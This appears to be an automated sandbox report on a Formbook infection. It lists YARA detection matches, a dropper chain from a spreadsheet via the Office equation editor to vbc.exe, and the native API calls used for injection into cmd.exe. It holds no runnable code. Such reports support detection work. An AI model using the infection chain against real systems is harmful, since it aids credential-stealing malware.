          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419D60 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419E10 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419E90 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419E0A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419E8F NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A307AC NtCreateMutant,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A31148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A31930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A31D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A571E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56F6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55C2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55C48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5618A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55C52D NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022907AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290060 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290078 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022901D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022910D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02291148 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FAD0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02291930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02291D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E10 NtReadFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E90 NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E0A NtReadFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E8F NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55A902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00035247
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00035A63
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381E00
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0038A118
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003872B2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003872C0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381B88
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381B82
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00385D70
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00385D60
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381DF4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00035247
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00035A63
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041E87B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D88
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409E40
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409E3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041DFAF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE63BF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A663DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A42305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8A37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC443E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC05E3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A86540
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A44680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE2622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8A634
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A429B2
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD49F5
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A569FE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8C920
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AECBA4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC6BCB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE2C9C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACAC5E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A70D3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4CD5B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A72E2F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5EE4C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADCFB1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AB2FDC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A50F3F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ABD06D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A43040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACD13F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE1238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A47353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A75485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A51489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A7D47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE35DA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A757C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD771D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADF8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ABF8C4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC394B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC5955
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AF3A83
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FBD7
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACDBDA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A67B00
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADFDDD
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACBF14
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6DF7C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55B210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5612D2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55276A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55E46C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5639B6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229E2E9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A2305
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022EA37B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023463BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022C63DB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229E0C6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02342622
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022EA634
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A4680
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022AE6C1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022AC7BC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232443E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022E6540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023205E3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022BC5F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0234CBA4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02326BCB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022C286D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022AC85C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022EC920
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A29B2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0234098E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023349F5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B69FE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D2E2F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022BEE4C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B0F3F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233CFB1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02312FDC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232AC5E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02342C9C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D0D3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022ACD5B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02341238
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A7353
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229F3CF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022CD005
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0231D06D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A3040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B905A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232D13F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233771D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232579A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D57C3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022DD47D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B1489
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D5485
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A351F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023435DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02353A83
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022C7B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232DBDA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229FBD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233F8EE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0231F8C4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02325955
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232394B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232BF14
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022CDF7C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233FDDD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00082D88
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00082D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00089E3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00089E40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009DFAF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00082FB0
          Source: Request for quotation.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A8373B appears 253 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A83F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A3E2A8 appears 60 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00AAF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A3DF5C appears 137 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0229DF5C appears 137 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 022E3F92 appears 132 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 022E373B appears 253 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0229E2A8 appears 60 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0230F970 appears 84 times
          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
